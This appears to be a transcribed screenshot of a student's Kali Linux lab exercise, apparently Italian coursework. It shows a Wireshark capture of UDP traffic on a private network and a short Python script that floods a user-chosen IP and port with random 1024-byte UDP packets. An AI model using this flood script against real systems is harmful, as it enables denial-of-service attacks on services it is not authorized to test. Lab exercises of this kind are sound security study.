

Kali Linux [In esecuzione] - Oracle VM VirtualBox

File Macchina Visualizza Impostazioni Dispositivi Aiuto

Capturing from any

File Edit View Go Capture Analyze Statistics Telephony Wireless Tools Help

Current filter: ip.addr == 192.168.1.206

No.	Time	Source	Destination	Protocol	Length	Info
65	36.696882170	192.168.1.206	192.168.1.206	ICMP	592	Destination ...
66	36.696887720	192.168.1.206	192.168.1.206	UDP	1068	53278 → 4444
67	36.69689420	192.168.1.206	192.168.1.206	ICMP	592	Destination ...
68	36.696904570	192.168.1.206	192.168.1.206	UDP	1068	53278 → 4444
69	36.696906323	192.168.1.206	192.168.1.206	ICMP	592	Destination ...
70	36.696911539	192.168.1.206	192.168.1.206	UDP	1068	53278 → 4444
71	36.696913177	192.168.1.206	192.168.1.206	ICMP	592	Destination ...
628	446.878766359	192.168.1.206	192.168.50.101	UDP	1068	38401 → 80 L
629	446.878825901	192.168.1.206	192.168.50.101	UDP	1068	38401 → 80 L
630	446.878835604	192.168.1.206	192.168.50.101	UDP	1068	38401 → 80 L
631	446.878842805	192.168.1.206	192.168.50.101	UDP	1068	38401 → 80 L
632	446.878943447	192.168.1.206	192.168.50.101	UDP	1068	38401 → 80 L
633	446.878943794	192.168.1.206	192.168.50.101	UDP	1068	38401 → 80 L
634	446.871034599	192.168.1.206	192.168.50.101	UDP	1068	38401 → 80 L
635	446.871036221	192.168.1.206	192.168.50.101	UDP	1068	38401 → 80 L
636	446.871069267	192.168.1.206	192.168.50.101	UDP	1068	38401 → 80 L
637	446.871070549	192.168.1.206	192.168.50.101	UDP	1068	38401 → 80 L

Frame 52: 1888 bytes on wire (8544 bits), 11
Linux cooked capture v1
Internet Protocol Version 4, Src: 192.168.1.
User Datagram Protocol, Src Port: 53278, Dst
Data (1824 bytes)

any: <live capture in progress> | Packets: 804 - Displayed: 30 (3.7%) | Profile: Default

davide@kali: ~/Desktop

File Actions Edit View Help

Invio dati
3
Invio dati
4
Invio dati
5
Invio dati
6
Invio dati
7
Invio dati
8
Invio dati
9

~/Desktop/5313.py - Mousepad

File Edit Search View Document Help Screenshot taken

```
1 import socket, random
2 SRV_ADDR=(input("Inserisci IP Target :"))
3 SRV_PORT=int(input("Inserisci la porta Targhet"))
4 server_address=(SRV_ADDR,SRV_PORT)
5 pacchetto= random.randbytes(1024)
6 s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
7
8 num_pacchetti= int(input("Numero pacchetti da inviare"))
9 contatore= 0
10
11 while contatore < num_pacchetti:
12     s.sendto(pacchetto,server_address)
13
14     print("\n Invio dati\n",contatore)
15     contatore=contatore + 1
16
```

davide@kali:~/Desktop

16°C
Preval. nuvol.

Cerca

15:34
09/02/2024